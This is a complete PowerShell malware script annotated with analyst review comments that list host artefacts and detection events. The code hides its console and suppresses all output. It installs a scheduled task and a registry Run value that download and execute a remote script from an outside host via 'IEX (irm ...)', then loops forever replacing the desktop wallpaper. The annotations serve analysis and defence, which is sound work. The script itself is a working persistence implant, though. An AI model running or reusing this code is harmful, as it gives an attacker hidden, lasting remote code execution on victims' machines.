# Review summary (PowerShell, not C#; the only C# is the two P/Invoke shims
# passed to Add-Type). In order, the script:
#   1. hides its own console window and silences every output stream;
#   2. installs two persistence entries that fetch and execute a remote script;
#   3. loops forever, downloading an image and applying it as the wallpaper.
#
# Host artefacts that can be read directly from this file:
#   - scheduled task named "WallpaperPersist" (startup trigger, highest run level)
#   - HKCU:\Software\Microsoft\Windows\CurrentVersion\Run value "WallpaperPersist"
#   - file "wallpaper<ext>" in the user's %TEMP% directory
#   - powershell.exe command line containing "-W Hidden -Exec Bypass" and "IEX (irm"
#   - cleartext HTTP requests to the host named in $Url / $ScriptUrl
# Clean-up has to remove both the task and the Run value; either one alone
# re-launches the remote script.
# The function names below look auto-generated (NOTE(review): presumably they
# vary between copies, so they are weak indicators compared with the list above).

# C# shim: GetConsoleWindow returns the handle of the console attached to this
# process; ShowWindow(handle, 0) hides it (0 is SW_HIDE).
$WinStyle = @"
using System;
using System.Runtime.InteropServices;
public class WindowHider {
    [DllImport("kernel32.dll")] static extern IntPtr GetConsoleWindow();
    [DllImport("user32.dll")] static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
    public static void Hide() {
        var handle = GetConsoleWindow();
        ShowWindow(handle, 0);
    }
}
"@
Add-Type $WinStyle
[WindowHider]::Hide()

# Completely disables console output: each Write-* cmdlet is shadowed by a
# function of the same name with an empty body. Functions are resolved before
# cmdlets, so calls made later in this session do nothing.
$null = New-Item -Path "function:Write-Host" -Value { param([string]$Message) } -Force
$null = New-Item -Path "function:Write-Output" -Value { param([string]$Message) } -Force
$null = New-Item -Path "function:Write-Error" -Value { param([string]$Message) } -Force
$null = New-Item -Path "function:Write-Warning" -Value { param([string]$Message) } -Force
$null = New-Item -Path "function:Write-Verbose" -Value { param([string]$Message) } -Force
$null = New-Item -Path "function:Write-Debug" -Value { param([string]$Message) } -Force

# Sets every stream preference to SilentlyContinue, so non-terminating errors,
# progress bars and verbose/debug/information messages are not displayed.
$ErrorActionPreference = "SilentlyContinue"
$ProgressPreference = "SilentlyContinue"
$VerbosePreference = "SilentlyContinue"
$DebugPreference = "SilentlyContinue"
$InformationPreference = "SilentlyContinue"

# ── Config ────────────────────────────────────────────────────────────────────
# $Url       : image that is downloaded and applied as wallpaper on each pass.
# $Style     : value written to WallpaperStyle (10 is the "Fill" style).
# $Interval  : minutes between passes (multiplied by 60 in the main loop).
# $TaskName / $RegRunName : names of the two persistence entries.
# $ScriptUrl : remote script that the persistence entries download and run.
# $PersistCmd is a double-quoted string, so $ScriptUrl is expanded here and the
# Run value ends up containing the literal URL. Switches: -NoP = -NoProfile,
# -NonI = -NonInteractive, -W Hidden = -WindowStyle Hidden,
# -Exec Bypass = -ExecutionPolicy Bypass; IEX (irm ...) is
# Invoke-Expression over Invoke-RestMethod, i.e. the response body is executed
# as PowerShell. The fetch is plain HTTP with no integrity check, so whatever
# the server returns at that moment is what runs on the host.
$Url = "http://x.celian-vf.fr/tchoupi.jpg"
$Style = 10
$Interval = 1
$TaskName = "WallpaperPersist"
$RegRunPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
$RegRunName = "WallpaperPersist"
$ScriptUrl = "http://x.celian-vf.fr/0.php"
$PersistCmd = "powershell -NoP -NonI -W Hidden -Exec Bypass `"IEX (irm '$ScriptUrl')`""

# ── Helpers ───────────────────────────────────────────────────────────────────

# Writes the wallpaper layout settings for the current user.
#   -Style : stored as WallpaperStyle; TileWallpaper becomes "1" only when
#            Style equals 1, otherwise "0".
function Set-SecretProcedure8021 {
    param([int]$Style)
    $regPath = "HKCU:\Control Panel\Desktop"
    $tile = if ($Style -eq 1) { "1" } else { "0" }
    Set-ItemProperty -Path $regPath -Name WallpaperStyle -Value $Style
    Set-ItemProperty -Path $regPath -Name TileWallpaper -Value $tile
}

# Applies the image at -Path as the desktop wallpaper through user32's
# SystemParametersInfo. The WallpaperAPI type is compiled only once per
# session (the -as [type] test skips Add-Type when it already exists).
# 0x0014 is SPI_SETDESKWALLPAPER; 0x01 -bor 0x02 combines SPIF_UPDATEINIFILE
# and SPIF_SENDCHANGE, so the change is saved to the user profile and
# broadcast to running applications. The return value is discarded.
function Invoke-SecretWorker1797 {
    param([string]$Path)
    if (-not ("WallpaperAPI" -as [type])) {
        Add-Type @"
using System;
using System.Runtime.InteropServices;
public class WallpaperAPI {
    [DllImport("user32.dll", CharSet = CharSet.Auto)]
    public static extern int SystemParametersInfo(
        int uAction, int uParam, string lpvParam, int fuWinIni);
}
"@
    }
    [WallpaperAPI]::SystemParametersInfo(0x0014, 0, $Path, 0x01 -bor 0x02) | Out-Null
}

# One wallpaper pass: download $Url to %TEMP%\wallpaper<ext>, check the first
# two bytes, then apply the style and the image. Throws "Not a valid image."
# when the check fails (the caller swallows the exception).
function PrivateEvent6170 {
    # Extension is taken from the URL with any query string removed.
    $ext = [IO.Path]::GetExtension($Url.Split('?')[0])
    $destPath = Join-Path $env:TEMP "wallpaper$ext"
    $webClient = New-Object System.Net.WebClient
    $webClient.DownloadFile($Url, $destPath)
    $bytes = [IO.File]::ReadAllBytes($destPath)
    # Two-byte signature test only: FF D8 = JPEG, 89 50 = PNG,
    # 47 49 = GIF ("GI"), 42 4D = BMP ("BM"). The rest of the file is not inspected.
    $isImage = ($bytes[0] -eq 0xFF -and $bytes[1] -eq 0xD8) -or
               ($bytes[0] -eq 0x89 -and $bytes[1] -eq 0x50) -or
               ($bytes[0] -eq 0x47 -and $bytes[1] -eq 0x49) -or
               ($bytes[0] -eq 0x42 -and $bytes[1] -eq 0x4D)
    if (-not $isImage) { throw "Not a valid image." }
    Set-SecretProcedure8021 -Style $Style
    Invoke-SecretWorker1797 -Path $destPath
}

# Installs both persistence entries.
#   1. Scheduled task $TaskName: runs powershell.exe at system startup with the
#      highest run level and the same download-and-execute argument as
#      $PersistCmd. Any failure is swallowed by the empty catch.
#      NOTE(review): registering a startup task at highest run level presumably
#      fails without elevation, which would explain the unconditional fallback.
#   2. Run value $RegRunName under HKCU: written regardless of whether the task
#      registration succeeded; it launches $PersistCmd at user logon.
# Detection: task creation is recorded as Security event 4698 when object-access
# auditing is enabled, and PowerShell script block logging (event 4104) records
# the text that IEX executes.
function StealthSignal4702 {
    try {
        $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoP -NonI -W Hidden -Exec Bypass `"IEX (irm '$ScriptUrl')`""
        $trigger = New-ScheduledTaskTrigger -AtStartup
        $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries
        Register-ScheduledTask -TaskName $TaskName -Action $action -Trigger $trigger `
            -Settings $settings -RunLevel Highest -Force | Out-Null
    } catch { }
    Set-ItemProperty -Path $RegRunPath -Name $RegRunName -Value $PersistCmd
}

# Returns a truthy value when either persistence entry already exists (the Run
# value or the scheduled task). Lookup errors are suppressed, so a missing
# entry simply evaluates to false.
function Test-RunningExecutor1448 {
    $hasReg = Get-ItemProperty -Path $RegRunPath -Name $RegRunName -ErrorAction SilentlyContinue
    $hasTask = Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue
    return ($hasReg -or $hasTask)
}

# ── Main ──────────────────────────────────────────────────────────────────────
# Persistence is installed only when neither entry is present, so a host that
# has had just one of the two removed is not repaired by this check.
if (-not (Test-RunningExecutor1448)) { StealthSignal4702 }

# Endless loop: one wallpaper pass, then sleep $Interval minutes (60 seconds
# with the configured value). Every exception from the pass is discarded, so
# download or validation failures leave no visible trace.
while ($true) {
    try { PrivateEvent6170 } catch { }
    Start-Sleep -Seconds ($Interval * 60)
}